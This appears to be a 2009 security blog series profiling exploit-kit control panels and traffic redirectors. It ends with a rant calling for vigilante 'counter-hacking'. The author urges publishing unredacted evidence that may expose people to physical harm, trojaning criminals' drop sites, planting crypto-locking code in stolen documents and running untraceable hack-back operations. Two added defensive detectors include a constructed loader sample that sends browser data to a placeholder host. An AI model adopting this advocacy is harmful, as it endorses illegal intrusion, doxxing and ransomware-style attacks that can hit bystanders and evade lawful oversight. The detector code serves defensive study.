Series: Looking through the keyhole – WebAttacker
March 25, 2009
Most believe this is what started it all: WebAttacker.
Series: Looking through the keyhole – Mpack
March 25, 2009
Mpack is something of a patriarch to many of the modern crimeware kits; still, it is important to know what kicked this whole thing off.
There were many versions (0.851, 0.91, 0.80).
Here is a screenshot of an Mpack interface. Here is an excellent overview of its backend components.
Panda also wrote a great writeup on it.
Notice how many of these packs have similar interfaces, reporting and features. Not much in the way of advanced innovation. They do innovate, however slowly, through evolutionary methods, not revolutionary ones. I would think that if you put real systems engineering design principles behind this you could come up with something way better.

You would think that with the amount of money this stuff pulls in there would be more original development. Then again it works… so why change.
Once again I will be looking for source to post here for research.
Has anyone done any market share studies on these packs? It would be interesting to see how the market share percentages play out globally and by region.
I would like to originate a new Thought Meme on this called “Malicious Product MarketShare”.
The goal would be to track the evolutionary phases and trends of these packs and their development, the pricing trends, their percentage of market share by region and globally, as well as localization and customization.
Additional trends would be the average number of exploits each includes, inclusion of new features, et cetera.
Here is an earlier version. Apparently it had not been using usernames, just passwords.

Apparently Finjan, in their research, clearly identifies the users of these services, as shown here in one of their reports.

This is a perfect example of implementing my Meme of “Open Source Evidence”. I bet you any amount of money that 2 years later these individuals met with no penalty whatsoever, due to the international excuse of throwing up our hands and saying what can you do…. we don't get cooperation…
Here is what you do, jackasses. Expose them to the light of day and then see what happens. Do you think that they would be employed by legitimate companies if they are known criminals? Do you think maybe you could expose them to possible physical harm due to them being outed? Do you think they would be employed by the bad guys if they are known to be exposed? IF sufficient light is placed on these people they become worthless, due to the fact that they would be potential targets for action, good or bad.
If I were a cyber mob boss and my henchmen were exposed, I would not want to take the risk of having them compromised and rolling on me. So the LESSON of the day is: POST THE EVIDENCE TO THE NET FIRST (unredacted, in all its true form and glory). THEN notify the authorities or the providers, IF you like, and if it's worth it. Probably not worth it if you ask me..

Series: Looking through the keyhole – IcePack
March 25, 2009
IcePack is an older pack. It is supposedly coded by a group called “The IDT Group”.
Here is a good writeup of its capabilities. It's a professional job. Great analysis by Dancho here.
Here is some additional analysis by da Panda. Here is an excellent writeup on its entire capabilities.
Note that most of these packs are Russian in origin and then become localized later in other languages.
I will be looking for the source to post, as well as doing research on possible exploits for this. It's possible that many of these packs are going the way of the dodo bird due to Darwin and natural selection. Adapt or die.
Here are some of its interfaces.

Series: Looking through the keyhole – NeoSploit
March 25, 2009
NeoSploit is an oldie but a goodie. There are many versions, and at one point it had a lot of market share. It was also one of the first to be ripped and used/configured by many others. Cannibals eat their own, it seems. The effect this has is that it drives down exploit pack prices.
It is written in C as a CGI program to be run on a web server. It is possible that it was written by “Grabarz”.
Known versions: 3.0.7, 3.1, 2.0.13, 2.0.17, 2.0.15, 2.0, 1.5, 1.0
Supposedly this crew quit development, but their source code and legacy will remain as more and more of these crimeware kits are cloned and innovated on by others.

I will be searching for the source code of this to make it available for research.
Why? To exploit it, that's why. Usually the nubs that run this shit are clueless about how to secure their own systems. Also we can take advantage of backdoors the authors put in to rip the data from the users. No honor among thieves, of course.
However, these decentralized operations are complex to unravel. The problem is that many times researchers do find out who it is, then notify the authorities to no avail.
I am advocating as a Thought Meme the era of Open Source Evidence. What does this mean exactly? It means the active and aggressive publication of evidence that validates and verifies known malware authors and crimeware authors. The evidence should clearly incriminate said parties. The evidence should be posted FIRST to the open source in high-traffic blogs and then reported to the authorities.
Law enforcement has had plenty of time to pursue these guys and, in their investigations, to “keep all hush hush” about the evidence and the personalities and organizations behind this fiasco of a mess. In the meantime victims suffer, with no compensation, retribution, or entity to champion their woes. I have said it many times: we are sheep among wolves, and our protectors are down the street, hanging out at McDonald's.
Here is another screenshot of Neosploit.

Here is some additional detail, such as the login page.

These are the sites the criminal compromised with iframes.

Here is a geographic distribution of the PWNed victims.

Series: Looking through the keyhole – Fiesta
March 25, 2009
Series: Looking through the keyhole – AdPack
March 25, 2009
Here is a kit called AdPack. I will begin searching for the source code or backend code for each of these exploit packs and post them here for security research and analysis. This stuff itself is not dangerous. These are command and control mechanisms to report on and monitor botnets.
What IS dangerous is the fact that software and systems do not automatically slipstream vulnerability fixes/patches to their users, ensuring that a time gap occurs which gives malicious users the opportunity to exploit systems.
We need to really start rethinking the concepts of software and challenge our traditional assumptions if we are ever truly going to make progress in this area.

INTELLIGENCE:
Who coded this, in what language, what is its current black market price, exploitable?
How prevalent or what kind of market share does it have?
What is its backend db?
Apparently there are many configuration vulnerabilities such as weak passwords that can be leveraged to compromise the back end components such as the FTP server, which also may be vulnerable.
What web servers are typically used for these packs? nginx? Some other?
Here is a link to some other ADpack screens as well as a C&C Interface for running commands.

As you can see above, if you get access to the command and control site you can destroy the system. Reference the UnInstall Me feature. Get System Info is a good way of notifying affected organizations. Clearly they don't understand the concept of privileged commands and role-based access control. Nor is each member's campaign usually segregated from other members' campaigns, thus no privacy per se.
Additionally these kits are like a service, so many users run multiple campaigns. Sounds like STING TIME!
It would be entirely plausible to generate a fake service like this with fake simulated information. Lure them in, identify them, then SMASH THEM.
You could provide fake or previously compromised data stores and simulate the growth of their botnets. It would be all you need to sow distrust and paranoia among people tempted to get into this line of nefarious work.
Here is what appears to be a localized Russian version of AdPack.

Series: Looking through the keyhole – Unique Pack
March 25, 2009
Unique Pack – Unique Sheaf Exploits

NOTE: the possible author of the pack.
Indication of author is not tantamount to owner of pack or operator of pack.
Most of these things are coded collaboratively from many authors and geographic locations.
For perspective, this would be a true realization of the disruptive nature of open source software.
The only real intelligence value of these things is:
What unique identifiers are in the kits that could allow for detection? See Google hacking.
["unique sheaf sploits" "Vparivatel" "All Vpars" "Totals/Loads"]
What language is used? Can the implementation be exploited?
How can you pwn the server to monitor usage? Exploitable??
Are the operators stupid enough to connect directly, or do they come in via proxied connections such as Tor?
WHERE is the DROP SITE? Can we trojan the drop site with a payload to track the movement of its data?
Can we poison pill the data (via cryptographic attack or assured-destruction secure delete) or the systems that use the data?
Series: Looking through the keyhole – SUTRA
March 25, 2009
So one may ask oneself: well, anyone can host a page that has exploits, but how do they manage the sheer scale and scope of the attacks we are seeing today? The answer is through sophisticated traffic redirectors.
Here is an example of one. It is called SUTRA. It provides sophisticated reporting and statistics. It basically monitors the traffic that is redirected based on a malicious iframe placed on a compromised site. The iframe then redirects to an exploit page.
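As an added example (not code from the original post, and not taken from any kit), here is a small check a site owner can run over their own pages to catch the kind of injected, invisible iframe the redirector depends on. The hostnames in the sample page are placeholders.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Width/height of 0 or 1 pixel: the injected frame is meant never to be seen
TINY_RE = re.compile(r"^\s*[01](px)?\s*$", re.I)


def _is_hidden(attrs: dict) -> bool:
    """True when the iframe is sized or styled so the visitor never sees it."""
    if any(TINY_RE.match(attrs.get(k, "")) for k in ("width", "height")):
        return True
    style = attrs.get("style", "").replace(" ", "").lower()
    if "display:none" in style or "visibility:hidden" in style:
        return True
    # Pushed far off-screen with a large negative offset
    return re.search(r"(?:left|top):-\d{3,}", style) is not None


class IframeCollector(HTMLParser):
    """Collect the attributes of every <iframe> in a page."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag == "iframe":
            self.iframes.append({k.lower(): (v or "") for k, v in attrs})


def suspicious_iframes(html: str, page_host: str) -> list:
    """Return (src, reasons) for iframes that are both hidden and off-domain.

    Visible third-party embeds and hidden same-origin frames are common on
    legitimate pages, so only the combination is reported.
    """
    collector = IframeCollector()
    collector.feed(html)
    hits = []
    for attrs in collector.iframes:
        src = attrs.get("src", "")
        # A relative src stays on the page's own host
        host = (urlparse(src).hostname or page_host).lower()
        reasons = []
        if host != page_host.lower():
            reasons.append("off-domain:" + host)
        if _is_hidden(attrs):
            reasons.append("hidden")
        if len(reasons) == 2:
            hits.append((src, reasons))
    return hits


# Constructed sample page (hostnames are placeholders): one normal video
# embed, one local hidden widget, and two injected off-site redirector frames.
SAMPLE_PAGE = """<html><body>
<h1>Local news</h1>
<iframe src="https://video.example.org/embed/42" width="640" height="360"></iframe>
<p>Story text.</p>
<iframe src="http://redirector.example.net/in.cgi?3" width="0" height="0"></iframe>
<iframe src="/widgets/weather" style="display:none"></iframe>
<iframe src="//stats.example.net/go.php" style="position:absolute; left:-1000px"></iframe>
</body></html>"""

if __name__ == "__main__":
    for src, why in suspicious_iframes(SAMPLE_PAGE, "news.example.org"):
        print(src, why)
```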

SEEKING INTELLIGENCE ON:
Geographic origin of code
Language coded in: CGI, possibly Perl
Black market price range
Forums it's marketed on (forums/IRC?)
Who the authors are
Exploitable? TBD
Google identifier search strings
Code derived from? Progeny.
How long it's been in existence
Number of versions
Apparently there are many of these traffic redirector services, and even market-based exchanges for this traffic.

Series: Looking through the keyhole – LuckySploit
March 25, 2009
I wanted to demonstrate the level of sophistication running the back end command and control servers for many of these web-based, usually P2P, botnets. Included are support contracts, fees for advanced services, reporting, and sometimes the occasional backdoor! Duh.
As currently shown by the Malware Domain List, the following pack is now very popular.
LuckySploit is currently considered by many analysts to be at the head of the pack in terms of obfuscation and features.
The pack includes dynamically generated, runtime-created obfuscated JavaScript in order to establish an encrypted communication session with the browser via asymmetric encryption. The browser then sends its critical info such as user agent, ActiveX controls, plugins, and platform information.
Based on this exchange of information, the pack sends a crafted exploit JUST FOR THE VICTIM. Whee. How special.
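Added example, not from the original post or from any kit: a defender-side heuristic that flags page scripts combining browser/plugin probing, runtime decoding and a call-home, the three ingredients of the profile-then-tailor flow described above. The marker lists, the verdict thresholds and the sample scripts are constructed assumptions for illustration.

```python
import re

# Browser/plugin probing APIs a victim-profiling stage reads
FINGERPRINT = [
    r"navigator\.userAgent", r"navigator\.plugins", r"navigator\.platform",
    r"navigator\.mimeTypes", r"new\s+ActiveXObject\s*\(",
]
# Runtime decoding / dynamic code typical of obfuscated loaders
OBFUSCATION = [
    r"\beval\s*\(", r"\bunescape\s*\(", r"String\.fromCharCode",
    r"document\.write\s*\(", r"(?:\\x[0-9a-f]{2}){8,}", r"(?:%[0-9a-f]{2}){8,}",
]
# Ways the collected profile is sent back before a second stage is served
EXFIL = [r"XMLHttpRequest", r"\.src\s*=\s*[^;]*\+", r"document\.cookie"]


def _hits(patterns, script):
    """Sorted list of the patterns that occur in the script text."""
    return sorted({p for p in patterns if re.search(p, script, re.I)})


def score_script(script: str) -> dict:
    """Report which marker families fired and a verdict.

    'tailored-exploit-candidate' requires all three families: the script
    reads browser/plugin details, decodes or builds code at runtime, and
    has a way to send the profile somewhere. Two families means 'review'.
    """
    fp, ob, ex = (_hits(FINGERPRINT, script), _hits(OBFUSCATION, script),
                  _hits(EXFIL, script))
    families = sum(1 for h in (fp, ob, ex) if h)
    verdict = ("tailored-exploit-candidate" if families == 3
               else "review" if families == 2 else "benign-looking")
    return {"fingerprint": fp, "obfuscation": ob, "exfil": ex,
            "verdict": verdict}


# Constructed samples (not real kit code): an ordinary snippet that merely
# logs the user agent, and a loader that profiles the browser, appends the
# profile to a script URL and decodes its own body at runtime.
BENIGN = "var ua = navigator.userAgent; console.log(ua);"
LOADER = (
    "var p = navigator.plugins.length + '|' + navigator.userAgent;"
    "try { new ActiveXObject('placeholder') } catch (e) {}"
    "var s = document.createElement('script');"
    "s.src = 'http://gate.example/load.php?p=' + p;"
    "eval(unescape('%61%6c%65%72%74%28%31%29%3b%3b%3b'));"
)

if __name__ == "__main__":
    for name, src in (("benign", BENIGN), ("loader", LOADER)):
        print(name, score_script(src)["verdict"])
```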

Here is the admin page.

Can't have it both ways, I call Shenanigans!
March 17, 2009
I’m calling Shenanigans!

Ok, I am starting to get a little pissed. As you know, I have been questioning why researchers are not more proactive about taking out botnets and hacking malware and its infrastructure. Common refrains are NONONONO, ooooo that would be illegal, blah blah blah.
Now see the following, just from today. There are many more such examples if you troll around.
Here is an article from the highly overhyped Brian Krebs, who I think does a good job reporting but really doesn't go far enough in his questions or the depth needed to really discuss the important issues in his articles. Even investigative reporters of the crappy kind go deeper than his content, which is sad, because if he chose to do so he would dramatically up the level of discussion and populate the idea pool with more useful ideas. He has the audience; now he just needs to up his game to be more effective as a thought leader instead of just a reporter. Reporters are boring from a research standpoint and do little to add to the cumulative public knowledge base to really solve problems.
Massive Profits Fueling Rogue Antivirus Market
http://blog.washingtonpost.com/securityfix/
“Prior to site’s demise, security researchers managed to snag a copy of the database for the TrafficConverter affiliate program.”
Now explain to me how they were able to do that without breaking any computer use laws. I want to be clear here. I am not supporting the breaking of laws; I am noting that said laws are used as an excuse not to really SOLVE the malware infrastructure problem and to support the security products industry's bottom line.
Based on stuff like this, an alternative is needed for protection… Awesome title BTW.
Storm Worm Botnet Lobotomizing Anti-Virus Programs
Any and all of these attempts would run afoul of some narrow-minded, anal-retentive lawyer and somehow break a computer law somewhere. However, the key things here are authority and intent.
If it's illegal to walk on the grass, yet you see a lady getting mugged on the other side of the really nice garden, do you run across the grass and help her, or walk ALL the way around and hope that the scumbag doesn't off her and make off with her valuables?
If there is a technical way to disable, subvert, dismantle, neuter, compromise, impact, DoS, or surveil a botnet, malware author, cybercrime crew, or criminal organization, then it should be investigated and done if possible, provided it does not make the system inoperable and unusable. The problem here is that you need extremely sophisticated techniques to do so. You can't have a bunch of jackass cyber vigilantes running amok and causing more havoc than good.
Actions should be assigned to competent organizations/researchers based on a validated and widespread threat. Sort of like what a CyberInterpol would do, but we know that will never happen. Essentially what we need is a vetting process whereby, through a collaborative cooperative, security responders/researchers get a free pass to conduct offensive surgical strikes on malware infrastructure and run ops against these crews.
Here is an attempt to attack Storm that was dead on arrival because there was no will and no balls behind the effort.
The result would be degradation of malware infrastructure, sowing distrust and discord among organizations, infiltration through stings, paying rival organizations to rat out their competitors, higher bounties, snatch-and-grab operations, poison-pilled exfiltration data from high-level targets, arrest and PREEEESSSUREEEE on the low-level schmucks to roll on their buddies, leadership chain attacks, exploitation of malware binaries to render them inert, integrity attacks on command and control channels to disrupt them or get them to disable or delete themselves, and updating the malware to do something beneficial like disable functions or change its communication mechanism so it is no longer reachable by its command and control at all. The field is WIDE OPEN for research to discuss and innovate, but do you see it being done?? NO. I repeat, NO.
And that's why I am calling SHENANIGANS on the whole lot of them. Whenever people bring the subject up, they give you the standard BS responses; however, in the background they do things, as shown in the previous articles, that would clearly be construed as illegal.
I am calling for a Cyber Free Fire Zone.

For example: make a law that says that for all machines that are compromised and attacked, the user or its designated parties are entitled, via a special use license, to make any modifications or take actions against said invading party. This basically protects the user from legal recourse and could fall under reasonable cyber self-defense guidelines. If you come into my house to steal my PlayStation 3 or rape my wife, I am going to beat the shit out of you, or worse in the second case; however, if you come into my computer and steal my vital data or work and compromise my identity or cause me extreme financial hardship, I have no recourse and can't do anything?!?!
Now people, that just doesn't make sense. From the government side we need a Cyber Monroe Doctrine, which I believe is a great idea. As well, if you look at the statistics, many of the malware operations are run from inside the United States, so I don't believe for a second that our laws' long arms can't reach into Poughkeepsie.
A person who I know well, Lenny Zeltser, who teaches courses for SANS on malware analysis (SANS 610), recently posted a “counter argument” that, while it has important points, I respectfully disagree with. I think you need to weigh the consequences between an active response and the impact of not acting. That is the ethical equation. If you can do more good than harm, you should seriously consider the action.
Here is some more on the BBC incident. Unfortunately I do not see many advocating any counter-malware actions, not to my surprise, because that is the status quo.
So what do we do? Prosecute security researchers for their intelligence actions that they try to keep on the down-low, while at the same time espousing support for the rule of law? I don't advocate that. I advocate the declaration of a Cyber Free Fire Zone, establishment of a Cyber Monroe Doctrine, creation of a counter-hack implied user license for legal protection, and enhanced and published experimentation and surgical counterstrike actions being conducted as I have stipulated above.
BBC Program Purchases Botnet, Touches Off Ethical Debate
BBC Responds to Botnet Controversy
Here is an interesting first step from Britain, at least attempting to solve the problem; however, it presents much opportunity for abuse and is only allowed for law enforcement, which defeats the purpose and overall goal. Regardless, Britain, with all its security incidents, is really in no way, shape or form qualified to lead in security research or cyber actions due to its nightmarish list of compromises and general cyber ignorance from its military, government and intel sectors.
Here is another example
Spam Botnet Taken Over By Good Guys: Now What?
Gee boss, now whut?? (Scratches his head.) The answer is focused collaborative research on cyber courses of action. DUH! That's what the military does all the time: establish courses of action against an enemy's order of battle. Then act. No action here….
Here is another example from the Prevx group
Stolen-data trove offers look inside a botnet
Now how could researchers obtain this and not break the law? Why was this box not infiltrated and monitored to prosecute, track and punish the people that connect and download said purloined information?
“Caches of stolen data like these are hidden throughout the Internet, usually locked away inside password-protected websites or heavily fortified servers. Prevx’s researchers were able to infiltrate this site because it was protected with poor encryption.”
- Cut the bullshit about not being able to do something as a security researcher and whining about laws. Researchers are already doing it; however, they are at risk of prosecution, so this debate is about empowering them by giving them cover or implied authority. A digital Robin Hood/Zorro, if you will.
I think the fact of the matter is, researchers don't want anyone else to do it, so they use the cover of the law to keep public debate to a minimum. As well, a lot of their SENSOR networks and compromised honeypots used for intelligence, which are themselves members of said botnets, are operational and doing everything a full member of a botnet would be doing, such as DDoS and spam. Maybe even SQL injection attacks à la ASPROX.
It would be nice if guys who had the balls, like Offensive Computing, had the same initiative and championed these counter cyber attack research options through public debate. Currently, I would imagine it is only debated in military and intel communities, but those organizations are so hamstrung with policies and bullshit that I doubt anything ever gets accomplished, or it's not in their domain, or they just don't care.
FBI included. They have only limited resources, ya know, and a threshold for what warrants attention. “So what, you got hacked and lost 10 grand to a Russian guy who drained your brokerage account. Go call the local PD. Dial 911. Operator: what's the emergency? Caller: some guy just hacked my computer and stole 10 grand from my brokerage account. Operator: that's not an emergency. Police officer: not my problem, call the FTC.” GET THE PICTURE?
“The website that Prevx found, which was operating on a server in Ukraine, was still online for nearly a month after security researchers alerted the Internet service provider and law-enforcement authorities. The site was sucking up data from 5,000 newly infected computers each day.” – wow, no action, I am not surprised…
They should have realized abuse complaints in that part of the world go straight to the bit bucket…. duh.. Next time, act. Compromise the data in the trove with beacons and find the real culprits; put crypto attack code in the documents so that whoever opens them gets their files cryptolocked with a secret key and a message to contact a POC to get their files unlocked. Other avenues of action are or could be equally disruptive and interesting. Send the bad guys' information and keystrokes back to the victim.
Here is another great example of retarded action.
Kraken the botnet: The ethics of counter-hacking
Two awesome researchers did excellent innovative work. Then what happened? NOTHING. Great job, management. Next time set up a Skunkworks unattributable group with resources that are untraceable and fucking do it. Then destroy all traces of said action. In the current environment this is the only recourse for real action. Someone needs to stick their dick in the pool first. Who's it going to be? Oh yeah, right, you're not supposed to find out. Sorry, you won't get the credit, but you'll be the one smiling in the room when it's discussed…..
Pretty soon we need to start dealing with these issues effectively, and dealing with the likes of these.

Or we can start expecting our data and vital operations to look like this…
